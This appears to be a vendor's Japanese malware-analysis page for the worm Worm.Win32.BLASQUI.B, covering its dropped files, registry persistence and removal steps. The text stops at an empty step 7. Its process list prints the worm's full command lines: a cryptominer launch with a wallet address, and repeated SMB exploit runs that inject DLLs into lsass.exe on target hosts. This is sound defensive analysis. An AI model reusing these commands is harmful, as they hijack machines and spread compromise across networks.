Worm.Win32.BLASQUI.B

2023年8月31日

解析者: Raymart Christian Yambot

別名:

Trojan.Win32.Wofith.agu (KASPERSKY)

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ: ワーム
破壊活動の有無: なし
暗号化:
感染報告の有無: はい

概要

感染経路他のマルウェアからの作成, インターネットからのダウンロード

ワームは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 9,402,368 bytes

タイプ EXE

メモリ常駐なし

発見日 2023年8月25日

ペイロード URLまたはIPアドレスに接続, ファイルの作成, システムのレジストリの変更

侵入方法

ワームは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

ワームは、以下のファイルを作成します。

%All Users Profile%\spread.txt → copy of itself
%Windows%\bbfsvcc.exe → deleted afterwards
%All Users Profile%\SMB.exe → deleted afterwards
%All Users Profile%\X86.dll
%All Users Profile%\X64.dll
%All Users Profile%\{IP Address}.txt
\{IP Address}\ADMIN$\spread.txt

(註：%All Users Profile%フォルダは、ユーザの共通プロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\All Users” です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData” です。. %Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

ワームは、以下のプロセスを追加します。

md /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr {Malware File Path} /F
cmd /c taskkill /f /im bbfsvcc.exe&&exit
taskkill /f /im bbfsvcc.exe
cmd /c ipconfig /flushdns
cmd /c taskkill /f /im bbfsvcc.exe&&exit;
%Windows%\bbfsvcc.exe -o stratum+tcp://{BLOCKED}pool.org:19999 -a cn/r -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
%All Users Profile%\SMB.exe
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostlong.exe --TargetIp {Target IP} --Target {Target OS Machine} --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmd /c cd %All Users Profile%\&&svchostlong.exe --TargetIp {Target IP} --Target {Target OS Machine} --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostlong.exe --TargetIp {Target IP} --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
svchostlong.exe --TargetIp {Target IP} --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt

自動実行方法

ワームは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
QQMusic = {Malware File Path}

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
QQMusic = {Malware File Path}

他のシステム変更

ワームは、以下のレジストリ値を追加します。

HKEY_CURRENT_USER\Network\K
RemotePath = \{IP Address}\ADMIN$

HKEY_CURRENT_USER\Network\K
UserName =

HKEY_CURRENT_USER\Network\K
ProviderName = Microsoft Windows Network

HKEY_CURRENT_USER\Network\K
ProviderType = 131072

HKEY_CURRENT_USER\Network\K
ConnectionType = 0

KEY_CURRENT_USER\Network\K
DeferFlags = 4

その他

ワームは、以下のレジストリキーを追加します。

HKEY_CURRENT_USER\Network\K

ワームは、以下の不正なWebサイトにアクセスします。

{BLOCKED}.{BLOCKED}.{BLOCKED}.2
{BLOCKED}.{BLOCKED}.{BLOCKED}.11
{BLOCKED}.{BLOCKED}.{BLOCKED}.15
{BLOCKED}.{BLOCKED}.{BLOCKED}.4
{BLOCKED}.{BLOCKED}.{BLOCKED}.6
{BLOCKED}.{BLOCKED}.{BLOCKED}.10
{BLOCKED}.{BLOCKED}.{BLOCKED}.5
{BLOCKED}.{BLOCKED}.{BLOCKED}.8
{BLOCKED}.{BLOCKED}.{BLOCKED}.24
{BLOCKED}.{BLOCKED}.{BLOCKED}.26
{BLOCKED}.{BLOCKED}.{BLOCKED}.17
{BLOCKED}.{BLOCKED}.{BLOCKED}.27
{BLOCKED}.{BLOCKED}.{BLOCKED}.7
{BLOCKED}.{BLOCKED}.{BLOCKED}.9
{BLOCKED}.{BLOCKED}.{BLOCKED}.35
{BLOCKED}.{BLOCKED}.{BLOCKED}.23
{BLOCKED}.{BLOCKED}.{BLOCKED}.21
{BLOCKED}.{BLOCKED}.{BLOCKED}.25
{BLOCKED}.{BLOCKED}.{BLOCKED}.37
{BLOCKED}.{BLOCKED}.{BLOCKED}.31
{BLOCKED}.{BLOCKED}.{BLOCKED}.29
{BLOCKED}.{BLOCKED}.{BLOCKED}.12
{BLOCKED}.{BLOCKED}.{BLOCKED}.18
{BLOCKED}.{BLOCKED}.{BLOCKED}.18
{BLOCKED}.{BLOCKED}.{BLOCKED}.32
{BLOCKED}.{BLOCKED}.{BLOCKED}.40
{BLOCKED}.{BLOCKED}.{BLOCKED}.16
{BLOCKED}.{BLOCKED}.{BLOCKED}.28
{BLOCKED}.{BLOCKED}.{BLOCKED}.30
{BLOCKED}.{BLOCKED}.{BLOCKED}.36
{BLOCKED}.{BLOCKED}.{BLOCKED}.42
{BLOCKED}.{BLOCKED}.{BLOCKED}.90
{BLOCKED}.{BLOCKED}.{BLOCKED}.44
{BLOCKED}.{BLOCKED}.{BLOCKED}.48
{BLOCKED}.{BLOCKED}.{BLOCKED}.50
{BLOCKED}.{BLOCKED}.{BLOCKED}.22
{BLOCKED}.{BLOCKED}.{BLOCKED}.46
{BLOCKED}.{BLOCKED}.{BLOCKED}.34
{BLOCKED}.{BLOCKED}.{BLOCKED}.13
{BLOCKED}.{BLOCKED}.{BLOCKED}.66
{BLOCKED}.{BLOCKED}.{BLOCKED}.70
{BLOCKED}.{BLOCKED}.{BLOCKED}.14
{BLOCKED}.{BLOCKED}.{BLOCKED}.74
{BLOCKED}.{BLOCKED}.{BLOCKED}.76
{BLOCKED}.{BLOCKED}.{BLOCKED}.60
{BLOCKED}.{BLOCKED}.{BLOCKED}.98
{BLOCKED}.{BLOCKED}.{BLOCKED}.52
{BLOCKED}.{BLOCKED}.{BLOCKED}.80
{BLOCKED}.{BLOCKED}.{BLOCKED}.86
{BLOCKED}.{BLOCKED}.{BLOCKED}.54
{BLOCKED}.{BLOCKED}.{BLOCKED}.62
{BLOCKED}.{BLOCKED}.{BLOCKED}.64
{BLOCKED}.{BLOCKED}.{BLOCKED}.68
{BLOCKED}.{BLOCKED}.{BLOCKED}.72
{BLOCKED}.{BLOCKED}.{BLOCKED}.82
{BLOCKED}.{BLOCKED}.{BLOCKED}.84
{BLOCKED}.{BLOCKED}.{BLOCKED}.88
{BLOCKED}.{BLOCKED}.{BLOCKED}.92
{BLOCKED}.{BLOCKED}.{BLOCKED}.94
{BLOCKED}.{BLOCKED}.{BLOCKED}.78
{BLOCKED}.{BLOCKED}.{BLOCKED}.41
{BLOCKED}.{BLOCKED}.{BLOCKED}.79
{BLOCKED}.{BLOCKED}.{BLOCKED}.19
{BLOCKED}.{BLOCKED}.{BLOCKED}.20

対応方法

対応検索エンジン: 9.800

初回 VSAPI パターンバージョン 18.666.03

初回 VSAPI パターンリリース日 2023年8月30日

VSAPI OPR パターンバージョン 18.667.00

VSAPI OPR パターンリリース日 2023年8月31日

手順 1

トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。

Troj.Win32.TRX.XXPE50FFF071

手順 2

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 3

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 4

このレジストリキーを削除します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_CURRENT_USER\Network\K

手順 5

このレジストリ値を削除します。

[ 詳細 ]

In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- QQMusic = {Malware File Path}
In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- QQMusic = {Malware File Path}
In HKEY_CURRENT_USER\Network\K
- RemotePath = \\{IP Addres}\ADMIN$
In HKEY_CURRENT_USER\Network\K
- UserName
In HKEY_CURRENT_USER\Network\K
- ProviderName = Microsoft Windows Network
In HKEY_CURRENT_USER\Network\K
- ProviderType = 131072
In HKEY_CURRENT_USER\Network\K
- ConnectionType = 0
In HKEY_CURRENT_USER\Network\K
- DeferFlags = 4

手順 6

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%All Users Profile%\spread.txt
%Windows%\bbfsvcc.exe
%Windows\bbfsvcc.exe
%All Users Profile%\SMB.exe
%All Users Profile%\X86.dll
%All Users Profile%\X64.dll
%All Users Profile%\{IP Address}.txt
\\{IP Address}\ADMIN$\spread.txt

マルウェアのコンポーネントファイルの削除：

Windows 2000、XP および Server 2003 の場合：

[スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
[ファイル名のすべてまたは一部]に以下のファイル名を入力してください。
%All Users Profile%\spread.txt
%Windows%\bbfsvcc.exe
%Windows\bbfsvcc.exe
%All Users Profile%\SMB.exe
%All Users Profile%\X86.dll
%All Users Profile%\X64.dll
%All Users Profile%\{IP Address}.1.txt
\\{IP Address}\ADMIN$\spread.txt
[探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。（例：ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索）

Windows Vista、7、Server 2008、8、8.1、10 および Server 2012 の場合：

Windowsエクスプローラ画面を開きます。
- Windows Vista、7 および Server 2008 の場合：
  - [スタート]-[コンピューター]を選択します。
- Windows 8、8.1、10 および Server 2012 の場合：
  - 画面の左下隅を右クリックし、[エクスプローラー]を選択します。
[コンピューターの検索]に、以下を入力します。
%All Users Profile%\spread.txt
%Windows%\bbfsvcc.exe
%Windows\bbfsvcc.exe
%All Users Profile%\SMB.exe
%All Users Profile%\X86.dll
%All Users Profile%\X64.dll
%All Users Profile%\{IP Address}.1.txt
\\{IP Address}\ADMIN$\spread.txt
ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：Windows 7 および Server 2008 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 7

